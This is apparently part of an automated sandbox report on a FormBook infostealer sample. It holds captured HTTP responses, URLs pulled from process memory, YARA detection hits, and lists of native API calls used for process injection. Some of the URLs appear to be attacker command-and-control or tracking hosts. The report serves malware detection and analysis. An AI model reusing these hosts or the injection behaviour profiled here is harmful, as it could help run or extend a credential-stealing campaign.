14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 6c 61 73 73 2e 74 65 61 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 114<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.klass.team Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 07:52:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"67d29e5f-582"X-Edge-Location: MonoData Raw: 35 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 75 73 65 6f 53 61 6e 73 22 2c 20 22 4f 70 65 6e 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 61 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 39 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a
                Source: svchost.exe, 0000000A.00000002.2838530968.000002278C60E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=NDhTOHRSMTRTeVQwa2J4UzhBeThLMjdPNjNVWVliYW9UTlhYeHowT
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.000000000260B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3292767539.0000000004B02000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3292767539.0000000004B02000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net/yas3/
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                Source: svchost.exe, 0000000A.00000003.1203437227.000002278C550000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: help.exe, 00000006.00000002.3289014379.000000000067C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: help.exe, 00000006.00000002.3289014379.000000000067C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: help.exe, 00000006.00000003.1176152816.000000000767B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: qmgr.db.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: help.exe, 00000006.00000002.3291321296.000000000492A000.00000004.10000000.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000003BAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0042C623 NtClose,3_2_0042C623
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2B60 NtClose,LdrInitializeThunk,3_2_019B2B60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_019B2DF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019B2C70
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B35C0 NtCreateMutant,LdrInitializeThunk,3_2_019B35C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B4340 NtSetContextThread,3_2_019B4340
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B4650 NtSuspendThread,3_2_019B4650
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2B80 NtQueryInformationFile,3_2_019B2B80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BA0 NtEnumerateValueKey,3_2_019B2BA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BF0 NtAllocateVirtualMemory,3_2_019B2BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BE0 NtQueryValueKey,3_2_019B2BE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AB0 NtWaitForSingleObject,3_2_019B2AB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AD0 NtReadFile,3_2_019B2AD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AF0 NtWriteFile,3_2_019B2AF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DB0 NtEnumerateKey,3_2_019B2DB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DD0 NtDelayExecution,3_2_019B2DD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D10 NtMapViewOfSection,3_2_019B2D10
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D00 NtSetInformationFile,3_2_019B2D00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2D30 NtUnmapViewOfSection,3_2_019B2D30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CA0 NtQueryInformationToken,3_2_019B2CA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CC0 NtQueryVirtualMemory,3_2_019B2CC0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2CF0 NtOpenProcess,3_2_019B2CF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C00 NtQueryInformationProcess,3_2_019B2C00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C60 NtCreateKey,3_2_019B2C60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F90 NtProtectVirtualMemory,3_2_019B2F90
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FB0 NtResumeThread,3_2_019B2FB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FA0 NtQuerySection,3_2_019B2FA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2FE0 NtCreateFile,3_2_019B2FE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F30 NtCreateSection,3_2_019B2F30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2F60 NtCreateProcessEx,3_2_019B2F60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2E80 NtReadVirtualMemory,3_2_019B2E80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2EA0 NtAdjustPrivilegesToken,3_2_019B2EA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2EE0 NtQueueApcThread,3_2_019B2EE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2E30 NtWriteVirtualMemory,3_2_019B2E30
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3090 NtSetValueKey,3_2_019B3090
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3010 NtOpenDirectoryObject,3_2_019B3010
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B39B0 NtGetContextThread,3_2_019B39B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3D10 NtOpenProcessToken,3_2_019B3D10
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B3D70 NtOpenThread,3_2_019B3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE4340 NtSetContextThread,LdrInitializeThunk,6_2_02CE4340
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE4650 NtSuspendThread,LdrInitializeThunk,6_2_02CE4650
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AD0 NtReadFile,LdrInitializeThunk,6_2_02CE2AD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AF0 NtWriteFile,LdrInitializeThunk,6_2_02CE2AF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02CE2BE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02CE2BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02CE2BA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2B60 NtClose,LdrInitializeThunk,6_2_02CE2B60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02CE2EE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02CE2E80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FE0 NtCreateFile,LdrInitializeThunk,6_2_02CE2FE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FB0 NtResumeThread,LdrInitializeThunk,6_2_02CE2FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F30 NtCreateSection,LdrInitializeThunk,6_2_02CE2F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02CE2CA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C60 NtCreateKey,LdrInitializeThunk,6_2_02CE2C60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02CE2C70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DD0 NtDelayExecution,LdrInitializeThunk,6_2_02CE2DD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02CE2DF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02CE2D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02CE2D30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE35C0 NtCreateMutant,LdrInitializeThunk,6_2_02CE35C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE39B0 NtGetContextThread,LdrInitializeThunk,6_2_02CE39B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2AB0 NtWaitForSingleObject,6_2_02CE2AB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2B80 NtQueryInformationFile,6_2_02CE2B80
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2EA0 NtAdjustPrivilegesToken,6_2_02CE2EA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2E30 NtWriteVirtualMemory,6_2_02CE2E30
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F90 NtProtectVirtualMemory,6_2_02CE2F90
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2FA0 NtQuerySection,6_2_02CE2FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2F60 NtCreateProcessEx,6_2_02CE2F60
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CC0 NtQueryVirtualMemory,6_2_02CE2CC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2CF0 NtOpenProcess,6_2_02CE2CF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2C00 NtQueryInformationProcess,6_2_02CE2C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2DB0 NtEnumerateKey,6_2_02CE2DB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE2D00 NtSetInformationFile,6_2_02CE2D00
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3090 NtSetValueKey,6_2_02CE3090
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3010 NtOpenDirectoryObject,6_2_02CE3010
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3D70 NtOpenThread,6_2_02CE3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CE3D10 NtOpenProcessToken,6_2_02CE3D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00628E40 NtCreateFile,6_2_00628E40
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00628FA0 NtReadFile,6_2_00628FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629090 NtDeleteFile,6_2_00629090
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629130 NtClose,6_2_00629130
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_00629290 NtAllocateVirtualMemory,6_2_00629290
